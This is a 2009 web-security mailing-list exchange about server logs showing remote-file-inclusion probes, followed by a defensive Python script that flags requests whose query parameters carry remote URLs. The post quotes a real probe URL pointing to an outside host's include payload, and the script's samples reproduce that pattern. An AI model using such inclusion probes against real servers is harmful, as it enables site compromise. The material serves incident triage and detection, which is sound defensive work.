WebApp Sec mailing list archives
Re: 404 messages pointing to a strange location
From: Daniel Clemens <daniel.clemens () packetninjas net>
Date: Sat, 3 Jan 2009 12:45:13 -0600
On Jan 2, 2009, at 4:10 AM, Simon wrote:
Hi all,
Yesterday evening I had lots of 404-messages from my web server, all pointing to locations like http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt ? I don't use paypal or anything similar on my page; what does that mean?
Looks like a bug being exploited with file inclusion being rendered back to your server. I would look for other signs of compromise on your system as well as what Tom Ritter posted.
| Daniel Uriah Clemens | Packetninjas L.L.C |
| http://www.packetninjas.net | c. 205.567.6850 | o. 866.267.8851
"The secret to creativity is knowing how to hide your sources" Einstein
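A log-triage sketch for the advice in the reply above, as an added example that is not part of the original post: it scans access-log lines for query parameters whose value is a remote URL and separates requests that returned 404 from those that returned any other status and deserve a closer look. The Apache "combined" log format is an assumption, and the sample lines are constructed (documentation IP ranges, hypothetical paths other than the one quoted in the thread).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed Apache/nginx "combined" format; adjust the pattern for other layouts.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself an absolute URL is the inclusion-probe signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def remote_params(target):
    """Return (name, value) pairs whose percent-decoded value is a remote URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(v.strip())]

def triage(lines):
    """Split inclusion-style requests into failed probes (404) and ones to review.

    A non-404 status does not prove the include worked; it only means the
    requested script exists, so that script and its host need inspection.
    """
    probes, review = [], []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format
        hits = remote_params(m['target'])
        if not hits:
            continue
        record = (m['ip'], m['status'], m['target'], hits)
        (probes if m['status'] == '404' else review).append(record)
    return probes, review

# Constructed sample lines, not taken from any real server.
SAMPLE = [
    '198.51.100.23 - - [02/Jan/2009:21:14:05 +0100] "GET /something//ee_commerce/'
    'paypalcart.php?toroot=http://192.0.2.10/x/id3.txt? HTTP/1.1" 404 312 "-" "-"',
    '198.51.100.23 - - [02/Jan/2009:21:14:09 +0100] "GET /index.php?page='
    'http%3A%2F%2F192.0.2.10%2Fx%2Fid3.txt%3F HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [02/Jan/2009:21:15:00 +0100] "GET /index.php?page=about '
    'HTTP/1.1" 200 4821 "-" "-"',
]

if __name__ == "__main__":
    probes, review = triage(SAMPLE)
    for label, rows in (("failed probe", probes), ("REVIEW", review)):
        for ip, status, target, hits in rows:
            print(f"{label}: {ip} {status} {target} params={hits}")
```

Entries in the review list are the starting point for the wider compromise check: inspect the named script, its modification time, and any files written around the request timestamp.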